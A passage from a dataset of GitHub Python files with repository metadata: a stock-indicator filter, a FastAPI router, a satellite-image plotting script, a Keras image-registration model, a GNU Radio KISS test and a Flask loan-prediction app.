Dict\n\nfrom twsecrawler import ref\nfrom core import Candlestick\nfrom database import DbMapper\n\n\ndef is_bollinger_deviate(check_date: str, stock_no: str):\n\n try:\n db = DbMapper.db_mapper(check_date)\n stock_info = db.find_single_stock(stock_no)\n date_price_info = stock_info[\"prices\"][check_date]\n cur_p = date_price_info[\"end_p\"]\n boll_high = date_price_info[\"index\"][\"boll\"][\"boll_high\"]\n boll_low = date_price_info[\"index\"][\"boll\"][\"boll_low\"]\n\n except Exception as e:\n print(f'!!! Fail to get bollinger or end_p value for stock = {stock_no}, at date = {check_date}')\n print(e)\n return False\n\n if cur_p > boll_high:\n return True\n\n if cur_p < boll_low:\n return True\n\n return False\n","repo_name":"Nil-cire/stockAnalyst","sub_path":"stockfilter/BollingFilter.py","file_name":"BollingFilter.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32794936713","text":"from datetime import datetime, timedelta\nfrom fastapi import APIRouter, Body, HTTPException\nfrom fastapi.encoders import jsonable_encoder\nfrom json import JSONDecodeError\n\n\nfrom schemas.sportbots import *\nfrom schemas.util import *\n\nfrom db_helper import (\n create_document,\n get_document_by_id,\n get_document_by_name,\n get_document_by_sport,\n get_documents,\n get_sportbot_by_number,\n)\n\n\nsportbots = APIRouter()\n\ncollection_name = \"sportbots_collection\"\n\n\n@sportbots.get(\"/sportbots/\")\nasync def get_sportrollbots(collection_name: str = collection_name):\n sportbot = await get_documents(collection_name)\n if sportbot:\n return ResponseModel(sportbot, \"Sportbot successfulyl retrieved from db\")\n return ResponseModel(sportbot, \"Empty list returned\")\n\n\n@sportbots.get(\"/sportbots/{number}\")\nasync def get_bot_by_number(number: int, collection_name: str = collection_name):\n sportbot = await get_sportbot_by_number(collection_name, number)\n if sportbot:\n return ResponseModel(\n sportbot, \"Successfully retrived Sportbot {} from DB\".format(number)\n )\n return ErrorResponseModel(\"Error\", 404, \"Something went wrong retrieved from db\")\n\n\n@sportbots.post(\"/sportbots/\")\nasync def add_rollbot_data(\n collection_name: str = collection_name, sportrollbot: SportbotSchema = Body(...)\n):\n try:\n sportrollbot = jsonable_encoder(sportrollbot)\n print(sportrollbot)\n new_sportbot = await create_document(collection_name, sportrollbot)\n print(new_sportbot)\n return ResponseModel(new_sportbot, \"Sportbot added succesfully\")\n except JSONDecodeError:\n raise HTTPException(status_code=400, detail=\"Invalid JSON format\")\n","repo_name":"69Kadsen/BackendProject","sub_path":"my_app/api/routes/sportbots.py","file_name":"sportbots.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41946851940","text":"\"\"\"Plots satellite images for the given days.\"\"\"\n\nimport argparse\nimport numpy\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import pyplot\nfrom gewittergefahr.gg_utils import number_rounding\nfrom gewittergefahr.gg_utils import time_conversion\nfrom gewittergefahr.gg_utils import file_system_utils\nfrom gewittergefahr.gg_utils import error_checking\nfrom ml4convection.io import satellite_io\nfrom ml4convection.io import example_io\nfrom ml4convection.io import border_io\nfrom ml4convection.plotting import plotting_utils\nfrom ml4convection.plotting import satellite_plotting\n\nSEPARATOR_STRING = '\\n\\n' + '*' * 50 + '\\n\\n'\n\nDAYS_TO_SECONDS = 86400\nTIME_FORMAT = '%Y-%m-%d-%H%M'\n\nFIGURE_RESOLUTION_DPI = 300\nFIGURE_WIDTH_INCHES = 15\nFIGURE_HEIGHT_INCHES = 15\n\nSATELLITE_DIR_ARG_NAME = 'input_satellite_dir_name'\nFIRST_DATE_ARG_NAME = 'first_date_string'\nLAST_DATE_ARG_NAME = 'last_date_string'\nBAND_NUMBERS_ARG_NAME = 'band_numbers'\nDAILY_TIMES_ARG_NAME = 'daily_times_seconds'\nSPATIAL_DS_FACTOR_ARG_NAME = 'spatial_downsampling_factor'\nOUTPUT_DIR_ARG_NAME = 'output_dir_name'\n\nSATELLITE_DIR_HELP_STRING = (\n 'Name of directory with satellite data. Files therein will be found by '\n '`satellite_io.find_file` and read by `satellite_io.read_file`.'\n)\nDATE_HELP_STRING = (\n 'Date (format \"yyyymmdd\"). Will plot satellite images for all days in the '\n 'period `{0:s}`...`{1:s}`.'\n).format(FIRST_DATE_ARG_NAME, LAST_DATE_ARG_NAME)\n\nBAND_NUMBERS_HELP_STRING = (\n 'List of band numbers. Will plot brightness temperatures for these '\n 'spectral bands only.'\n)\nDAILY_TIMES_HELP_STRING = (\n 'List of times to plot for each day. All values should be in the range '\n '0...86399.'\n)\nSPATIAL_DS_FACTOR_HELP_STRING = (\n 'Downsampling factor, used to coarsen spatial resolution. If you do not '\n 'want to coarsen spatial resolution, leave this alone.'\n)\nOUTPUT_DIR_HELP_STRING = (\n 'Name of top-level output directory. Images will be saved here (one '\n 'subdirectory per band).'\n)\n\nINPUT_ARG_PARSER = argparse.ArgumentParser()\nINPUT_ARG_PARSER.add_argument(\n '--' + SATELLITE_DIR_ARG_NAME, type=str, required=True,\n help=SATELLITE_DIR_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + FIRST_DATE_ARG_NAME, type=str, required=True, help=DATE_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + LAST_DATE_ARG_NAME, type=str, required=True, help=DATE_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + BAND_NUMBERS_ARG_NAME, type=int, nargs='+', required=True,\n help=BAND_NUMBERS_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + DAILY_TIMES_ARG_NAME, type=int, nargs='+', required=True,\n help=DAILY_TIMES_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + SPATIAL_DS_FACTOR_ARG_NAME, type=int, required=False, default=1,\n help=SPATIAL_DS_FACTOR_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + OUTPUT_DIR_ARG_NAME, type=str, required=True,\n help=OUTPUT_DIR_HELP_STRING\n)\n\n\ndef _plot_one_satellite_image(\n satellite_dict, time_index, band_index, border_latitudes_deg_n,\n border_longitudes_deg_e, top_output_dir_name):\n \"\"\"Plots one satellite image.\n\n :param satellite_dict: Dictionary in format returned by\n `satellite_io.read_file`.\n :param time_index: Index of time to plot.\n :param band_index: Index of spectral band to plot.\n :param border_latitudes_deg_n: See doc for `_plot_satellite_one_day`.\n :param border_longitudes_deg_e: Same.\n :param top_output_dir_name: Same.\n \"\"\"\n\n latitudes_deg_n = satellite_dict[satellite_io.LATITUDES_KEY]\n longitudes_deg_e = satellite_dict[satellite_io.LONGITUDES_KEY]\n\n figure_object, axes_object = pyplot.subplots(\n 1, 1, figsize=(FIGURE_WIDTH_INCHES, FIGURE_HEIGHT_INCHES)\n )\n\n plotting_utils.plot_borders(\n border_latitudes_deg_n=border_latitudes_deg_n,\n border_longitudes_deg_e=border_longitudes_deg_e,\n axes_object=axes_object\n )\n\n valid_time_unix_sec = (\n satellite_dict[satellite_io.VALID_TIMES_KEY][time_index]\n )\n valid_time_string = time_conversion.unix_sec_to_string(\n valid_time_unix_sec, TIME_FORMAT\n )\n band_number = satellite_dict[satellite_io.BAND_NUMBERS_KEY][band_index]\n title_string = 'Band-{0:d} brightness temperature at {1:s}'.format(\n band_number, valid_time_string\n )\n\n brightness_temp_matrix_kelvins = (\n satellite_dict[satellite_io.BRIGHTNESS_TEMP_KEY][\n time_index, ..., band_index\n ]\n )\n\n satellite_plotting.plot_2d_grid_latlng(\n brightness_temp_matrix_kelvins=brightness_temp_matrix_kelvins,\n axes_object=axes_object,\n min_latitude_deg_n=numpy.min(latitudes_deg_n),\n min_longitude_deg_e=numpy.min(longitudes_deg_e),\n latitude_spacing_deg=numpy.diff(latitudes_deg_n[:2])[0],\n longitude_spacing_deg=numpy.diff(longitudes_deg_e[:2])[0]\n )\n\n plotting_utils.plot_grid_lines(\n plot_latitudes_deg_n=latitudes_deg_n,\n plot_longitudes_deg_e=longitudes_deg_e, axes_object=axes_object,\n parallel_spacing_deg=2., meridian_spacing_deg=2.\n )\n\n axes_object.set_title(title_string)\n\n output_file_name = (\n '{0:s}/{1:s}/brightness-temperature_{2:s}_band{3:02d}.jpg'\n ).format(\n top_output_dir_name, valid_time_string[:10].replace('-', ''),\n valid_time_string, band_number\n )\n file_system_utils.mkdir_recursive_if_necessary(file_name=output_file_name)\n\n print('Saving figure to file: \"{0:s}\"...'.format(output_file_name))\n figure_object.savefig(\n output_file_name, dpi=FIGURE_RESOLUTION_DPI,\n pad_inches=0, bbox_inches='tight'\n )\n pyplot.close(figure_object)\n\n\ndef _plot_satellite_one_day(\n satellite_file_name, border_latitudes_deg_n, border_longitudes_deg_e,\n band_numbers, daily_times_seconds, spatial_downsampling_factor,\n top_output_dir_name):\n \"\"\"Plots satellite images for one day.\n\n P = number of points in border set\n\n :param satellite_file_name: Path to input file. Will be read by\n `satellite_io.read_file`.\n :param border_latitudes_deg_n: length-P numpy array of latitudes (deg N).\n :param border_longitudes_deg_e: length-P numpy array of longitudes (deg E).\n :param band_numbers: See documentation at top of file.\n :param daily_times_seconds: Same.\n :param spatial_downsampling_factor: Same.\n :param top_output_dir_name: Same.\n \"\"\"\n\n print('Reading data from: \"{0:s}\"...'.format(satellite_file_name))\n satellite_dict = satellite_io.read_file(\n netcdf_file_name=satellite_file_name, fill_nans=False\n )\n\n if spatial_downsampling_factor is not None:\n satellite_dict = example_io.downsample_data_in_space(\n satellite_dict=satellite_dict,\n downsampling_factor=spatial_downsampling_factor,\n change_coordinates=True\n )[0]\n\n satellite_dict = satellite_io.subset_by_band(\n satellite_dict=satellite_dict, band_numbers=band_numbers\n )\n\n valid_times_unix_sec = satellite_dict[satellite_io.VALID_TIMES_KEY]\n base_time_unix_sec = number_rounding.floor_to_nearest(\n valid_times_unix_sec[0], DAYS_TO_SECONDS\n )\n desired_times_unix_sec = numpy.round(\n base_time_unix_sec + daily_times_seconds\n ).astype(int)\n\n good_flags = numpy.array([\n t in valid_times_unix_sec for t in desired_times_unix_sec\n ], dtype=bool)\n\n if not numpy.any(good_flags):\n return\n\n desired_times_unix_sec = desired_times_unix_sec[good_flags]\n satellite_dict = satellite_io.subset_by_time(\n satellite_dict=satellite_dict,\n desired_times_unix_sec=desired_times_unix_sec\n )[0]\n\n num_times = len(satellite_dict[satellite_io.VALID_TIMES_KEY])\n num_bands = len(satellite_dict[satellite_io.BAND_NUMBERS_KEY])\n\n for i in range(num_times):\n for j in range(num_bands):\n _plot_one_satellite_image(\n satellite_dict=satellite_dict, time_index=i, band_index=j,\n border_latitudes_deg_n=border_latitudes_deg_n,\n border_longitudes_deg_e=border_longitudes_deg_e,\n top_output_dir_name=top_output_dir_name\n )\n\n\ndef _run(top_satellite_dir_name, first_date_string, last_date_string,\n band_numbers, daily_times_seconds, spatial_downsampling_factor,\n top_output_dir_name):\n \"\"\"Plots satellite images for the given days.\n\n This is effectively the main method.\n\n :param top_satellite_dir_name: See documentation at top of file.\n :param first_date_string: Same.\n :param last_date_string: Same.\n :param band_numbers: Same.\n :param daily_times_seconds: Same.\n :param spatial_downsampling_factor: Same.\n :param top_output_dir_name: Same.\n \"\"\"\n\n border_latitudes_deg_n, border_longitudes_deg_e = border_io.read_file()\n\n if spatial_downsampling_factor <= 1:\n spatial_downsampling_factor = None\n\n error_checking.assert_is_geq_numpy_array(daily_times_seconds, 0)\n error_checking.assert_is_less_than_numpy_array(\n daily_times_seconds, DAYS_TO_SECONDS\n )\n\n satellite_file_names = satellite_io.find_many_files(\n top_directory_name=top_satellite_dir_name,\n first_date_string=first_date_string,\n last_date_string=last_date_string,\n prefer_zipped=True, allow_other_format=True,\n raise_error_if_any_missing=False\n )\n\n for i in range(len(satellite_file_names)):\n _plot_satellite_one_day(\n satellite_file_name=satellite_file_names[i],\n border_latitudes_deg_n=border_latitudes_deg_n,\n border_longitudes_deg_e=border_longitudes_deg_e,\n band_numbers=band_numbers,\n daily_times_seconds=daily_times_seconds,\n spatial_downsampling_factor=spatial_downsampling_factor,\n top_output_dir_name=top_output_dir_name\n )\n\n if i != len(satellite_file_names) - 1:\n print(SEPARATOR_STRING)\n\n\nif __name__ == '__main__':\n INPUT_ARG_OBJECT = INPUT_ARG_PARSER.parse_args()\n\n _run(\n top_satellite_dir_name=getattr(\n INPUT_ARG_OBJECT, SATELLITE_DIR_ARG_NAME\n ),\n first_date_string=getattr(INPUT_ARG_OBJECT, FIRST_DATE_ARG_NAME),\n last_date_string=getattr(INPUT_ARG_OBJECT, LAST_DATE_ARG_NAME),\n band_numbers=numpy.array(\n getattr(INPUT_ARG_OBJECT, BAND_NUMBERS_ARG_NAME), dtype=int\n ),\n daily_times_seconds=numpy.array(\n getattr(INPUT_ARG_OBJECT, DAILY_TIMES_ARG_NAME), dtype=int\n ),\n spatial_downsampling_factor=getattr(\n INPUT_ARG_OBJECT, SPATIAL_DS_FACTOR_ARG_NAME\n ),\n top_output_dir_name=getattr(INPUT_ARG_OBJECT, OUTPUT_DIR_ARG_NAME)\n )\n","repo_name":"thunderhoser/ml4convection","sub_path":"ml4convection/scripts/plot_satellite.py","file_name":"plot_satellite.py","file_ext":"py","file_size_in_byte":10744,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"28851108888","text":"from __future__ import print_function\nfrom keras.models import Model\nfrom keras.layers import *\nfrom neuron.layers import SpatialTransformer\nfrom src.models.utils import get_initial_weights\nfrom src.models.layers import BilinearInterpolation\n\nclass BilinearUpsampling(Layer):\n\n def __init__(self, upsampling=(2, 2), data_format=None, **kwargs):\n\n super(BilinearUpsampling, self).__init__(**kwargs)\n self.data_format = conv_utils.normalize_data_format(data_format)\n self.upsampling = conv_utils.normalize_tuple(upsampling, 2, 'size')\n self.input_spec = InputSpec(ndim=4)\n\n def compute_output_shape(self, input_shape):\n height = self.upsampling[0] * \\\n input_shape[1] if input_shape[1] is not None else None\n width = self.upsampling[1] * \\\n input_shape[2] if input_shape[2] is not None else None\n return (input_shape[0],\n height,\n width,\n input_shape[3])\n\n def call(self, inputs):\n return K.tf.image.resize_bilinear(inputs, (int(inputs.shape[1]*self.upsampling[0]),\n int(inputs.shape[2]*self.upsampling[1])))\n\n def get_config(self):\n config = {'size': self.upsampling,\n 'data_format': self.data_format}\n base_config = super(BilinearUpsampling, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\ndef flowinverse(flow):\n flow0 = Lambda(lambda x: K.expand_dims(x[:, :, :, 0], axis=-1))(flow)\n flow1 = Lambda(lambda x: K.expand_dims(x[:, :, :, 1], axis=-1))(flow)\n\n flow0 = SpatialTransformer(interp_method='linear', indexing='ij', name='inverse_stn1')([flow0, flow])\n flow1 = SpatialTransformer(interp_method='linear', indexing='ij', name='inverse_stn2')([flow1, flow])\n\n flow_inverse = Concatenate()([flow0, flow1])\n flow_inverse = Lambda(lambda x: x * -1.)(flow_inverse)\n return flow_inverse\n\ndef BN_block(filter_num, input, name, trainable=True):\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1',\n trainable=trainable)(input)\n x = BatchNormalization(name='BN' + name + '_1', trainable=trainable)(x)\n # x = LeakyReLU(name='LeakyReLU' + name + '_1')(x)\n x = Activation('relu')(x)\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_2',\n trainable=trainable)(x)\n x = BatchNormalization(name='BN' + name + '_2', trainable=trainable)(x)\n # x = LeakyReLU(name='LeakyReLU' + name + '_2')(x)\n x = Activation('relu')(x)\n return x\n\ndef BN_block_leaky(filter_num, input, name, trainable=True):\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1',\n trainable=trainable)(input)\n x = BatchNormalization(name='BN' + name + '_1', trainable=trainable)(x)\n x = LeakyReLU(name='LeakyReLU' + name + '_1')(x)\n # x = Activation('relu')(x)\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_2',\n trainable=trainable)(x)\n x = BatchNormalization(name='BN' + name + '_2', trainable=trainable)(x)\n x = LeakyReLU(name='LeakyReLU' + name + '_2')(x)\n # x = Activation('relu')(x)\n return x\n\ndef block_leaky_single(filter_num, input, name, trainable=True):\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1',\n trainable=trainable)(input)\n x = LeakyReLU(name='LeakyReLU' + name + '_1')(x)\n return x\n\ndef Affine_arch(input_stack, trainable=False, w=16):\n affine_net1 = BN_block_leaky(w, input_stack, name='affine_net1', trainable=trainable)\n pool1 = MaxPooling2D(pool_size=(2, 2))(affine_net1)\n affine_net2 = BN_block_leaky(w * 2, pool1, name='affine_net2', trainable=trainable)\n pool2 = MaxPooling2D(pool_size=(2, 2))(affine_net2)\n affine_net3 = BN_block_leaky(w * 2, pool2, name='affine_net3', trainable=trainable)\n pool3 = MaxPooling2D(pool_size=(2, 2))(affine_net3)\n affine_net4 = BN_block_leaky(w * 4, pool3, name='affine_net4', trainable=trainable)\n pool4 = MaxPooling2D(pool_size=(2, 2))(affine_net4)\n affine_net5 = BN_block_leaky(w * 4, pool4, name='affine_net5', trainable=trainable)\n affine_net5 = Dropout(0.3, name='affine_net5gdrop_1')(affine_net5)\n pool5 = MaxPooling2D(pool_size=(2, 2))(affine_net5)\n affine_net6 = BN_block_leaky(w * 8, pool5, name='affine_net6', trainable=trainable)\n affine_net6 = Dropout(0.3, name='affine_net6gdrop_1')(affine_net6)\n\n affine_net = Flatten()(affine_net6)\n affine_net = Dense(32, activation='relu', name='affine_net_dense1', trainable=trainable)(affine_net)\n weights = get_initial_weights(32)\n affine_net = Dense(6, weights=weights, activation='linear', name='affine_net_dense2', trainable=trainable)(affine_net)\n\n return affine_net\n\ndef Unet_arch(input_stack, w=16, name='1'):\n conv1 = BN_block_leaky(w, input_stack, name=name + 'g1')\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n\n conv2 = BN_block_leaky(w*2, pool1, name=name + 'g2')\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n\n conv3 = BN_block_leaky(w*2, pool2, name=name + 'g3')\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n #\n conv4 = BN_block_leaky(w * 4, pool3, name=name + 'g4')\n drop4 = Dropout(0.3, name=name + 'gdrop_1')(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n #\n conv5 = BN_block_leaky(w * 4, pool4, name=name + 'g5')\n drop5 = Dropout(0.3, name=name + 'gdrop_2')(conv5)\n\n up6 = Conv2D(w * 4, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup6')(\n UpSampling2D(size=(2, 2))(drop5))\n up6 = BatchNormalization(name='BNup6')(up6)\n up6 = LeakyReLU(name='leakyup6')(up6)\n # up6 = Activation('relu')(up6)\n merge6 = Concatenate()([drop4, up6])\n conv6 = BN_block_leaky(w * 4, merge6, name=name + 'g6')\n #\n up7 = Conv2D(w * 2, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup7')(\n UpSampling2D(size=(2, 2))(conv6))\n up7 = BatchNormalization(name='BNup7')(up7)\n # up7 = Activation('relu')(up7)\n up7 = LeakyReLU(name='leakyup7')(up7)\n merge7 = Concatenate()([conv3, up7])\n conv7 = BN_block_leaky(w * 2, merge7, name=name + 'g7')\n #\n up8 = Conv2D(w*2, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup8')(\n UpSampling2D(size=(2, 2))(conv7))\n up8 = BatchNormalization(name='BNup8')(up8)\n up8 = LeakyReLU(name='leakyup8')(up8)\n # up8 = Activation('relu')(up8)\n merge8 = Concatenate()([conv2, up8])\n conv8 = BN_block_leaky(w*2, merge8, name=name +'g8')\n\n up9 = Conv2D(w, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup9')(\n UpSampling2D(size=(2, 2))(conv8))\n up9 = BatchNormalization(name='BNup9')(up9)\n up9 = LeakyReLU(name='leakyup9')(up9)\n # up9 = Activation('relu')(up9)\n merge9 = Concatenate()([conv1, up9])\n conv9 = BN_block_leaky(w, merge9, name=name + 'g9')\n\n # x1 = Conv2D(64, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1')(conv9)\n # x1 = BatchNormalization(name='BN' + 'end_1')(x1)\n # conv9 = Activation('tanh')(x1)\n\n return conv9\n\ndef Affine_net(w=16, trainable=False):\n src = Input(shape=(224, 224, 1))\n tgt = Input(shape=(224, 224, 1))\n\n input_stack = Concatenate()([src, tgt])\n affine_param = Affine_arch(input_stack, trainable=trainable, w=w)\n affine_result = BilinearInterpolation((224, 224), name='affine_result')([src, affine_param])\n\n model = Model(input=[src, tgt], output=[affine_result])\n return model\n\ndef dual_net(w):\n src = Input(shape=(224, 224, 1))\n tgt = Input(shape=(224, 224, 1))\n label = Input(shape=(224, 224, 1))\n\n input_stack = Concatenate()([src, tgt])\n affine_param = Affine_arch(input_stack, trainable=False)\n src_affine = BilinearInterpolation((224, 224), name='src_affine')([src, affine_param])\n\n flow_ori1 = Unet_arch(Concatenate()([src_affine, tgt]), w=w)\n flow = Conv2D(2, 3, name='flow', padding='same', activation='linear', kernel_initializer='he_normal')(flow_ori1)\n deformable = SpatialTransformer(interp_method='linear', indexing='ij', name='stn0')([src_affine, flow])\n\n flow_ori2 = flowinverse(flow)\n inverse_deformable = SpatialTransformer(interp_method='linear', indexing='ij', name='defo_iv')([deformable, flow_ori2])\n resduce = Lambda(lambda x: x[0] - x[1], name='rl')([src_affine, inverse_deformable])\n\n label_affine = BilinearInterpolation((224, 224), name='src_affine2')([label, affine_param])\n label_flow = SpatialTransformer(interp_method='linear', indexing='ij', name='stn4')([label_affine, flow])\n model = Model(input=[src, tgt, label], output=[flow, deformable, resduce, label_flow])\n\n return model\n","repo_name":"SZUHvern/TMI_multi-contrast-registration","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8881,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"36338804500","text":"from gnuradio import gr, blocks, gr_unittest\nimport pmt\nimport numpy as np\n\n# bootstrap satellites module, even from build dir\ntry:\n import python as satellites\nexcept ImportError:\n pass\nelse:\n import sys\n sys.modules['satellites'] = satellites\n\nfrom satellites import kiss_to_pdu, pdu_to_kiss\nfrom satellites.grtypes import byte_t\n\n\nclass qa_kiss(gr_unittest.TestCase):\n def setUp(self):\n self.tb = gr.top_block()\n\n def tearDown(self):\n self.tb = None\n\n def test_encoder_decoder(self):\n \"\"\"Connects a PDU to KISS and KISS to PDU and sends PDUs through\"\"\"\n pdu2kiss = pdu_to_kiss(include_timestamp=True)\n kiss2pdu = kiss_to_pdu()\n pdu2tag = blocks.pdu_to_tagged_stream(byte_t)\n dbg = blocks.message_debug()\n\n self.tb.connect(pdu2tag, kiss2pdu)\n self.tb.msg_connect((pdu2kiss, 'out'), (pdu2tag, 'pdus'))\n self.tb.msg_connect((kiss2pdu, 'out'), (dbg, 'store'))\n\n test_size = 150\n test_number_frames = 7\n test_data = [np.random.randint(0, 256, test_size, dtype='uint8')\n for _ in range(test_number_frames)]\n for td in test_data:\n test_frame = pmt.cons(pmt.PMT_NIL,\n pmt.init_u8vector(test_size, td))\n pdu2kiss.to_basic_block()._post(pmt.intern('in'), test_frame)\n pdu2kiss.to_basic_block()._post(\n pmt.intern('system'),\n pmt.cons(pmt.intern('done'), pmt.from_long(1)))\n\n self.tb.start()\n self.tb.wait()\n\n for j, td in enumerate(test_data):\n result_data = pmt.u8vector_elements(pmt.cdr(dbg.get_message(j)))\n np.testing.assert_equal(\n td, result_data,\n 'KISS to PDU output does not match expected frame')\n\n\nif __name__ == '__main__':\n gr_unittest.run(qa_kiss)\n","repo_name":"daniestevez/gr-satellites","sub_path":"python/qa_kiss.py","file_name":"qa_kiss.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":700,"dataset":"github-code","pt":"32"} +{"seq_id":"12128925639","text":"import pickle\nimport numpy as np\nimport os\n\nfrom flask import Flask, request, render_template, make_response\n\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import binarize, LabelEncoder, MinMaxScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import linear_model\n\n#from sklearn.utils.deprecation import deprecated\n\napp = Flask(__name__, static_url_path='/static')\napp.config[\"SEND_FILE_MAX_AGE_DEFAULT\"] = 0\n\n#arquivo = \"model/modelo.pkl\"\n#with open(arquivo, \"rb\") as f:\n# model = pickle.load(f)\n\nmodel = pickle.load(open(\"model/modelo.pkl\", \"rb\"))\n\n\n@app.route(\"/\")\ndef display_gui():\n return render_template(\"template.html\")\n\n\n@app.route(\"/verificar\", methods=[\"POST\"])\ndef verificar():\n sexo = request.form['gridRadiosSexo']\n dependentes = request.form['dependentes']\n casado = request.form['gridRadiosCasado']\n trabalho_conta_propria = request.form['gridRadiosTrabalhoProprio']\n rendimento = request.form['rendimento']\n educacao = request.form['educacao']\n valoremprestimo = request.form['valoremprestimo']\n teste = np.array([[\n sexo, casado, dependentes, educacao, trabalho_conta_propria,\n rendimento, valoremprestimo\n ]])\n\n print(\":::::: Dados de Teste ::::::\")\n print(\"Sexo: {}\".format(sexo))\n print(\"Numero de Dependentes: {}\".format(dependentes))\n print(\"Casado: {}\".format(casado))\n print(\"Educacao: {}\".format(educacao))\n print(\"Trabalha por conta propria: {}\".format(trabalho_conta_propria))\n print(\"Rendimento: {}\".format(rendimento))\n print(\"Valor do emprestimo: {}\".format(valoremprestimo))\n print(\"\\n\")\n\n classe = model.predict(teste)[0]\n print(\"Classe Predita: {}\".format(str(classe)))\n\n return render_template('template.html', classe=str(classe))\n\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)","repo_name":"andersonlx/machine-learning-previsao-emprestimo","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}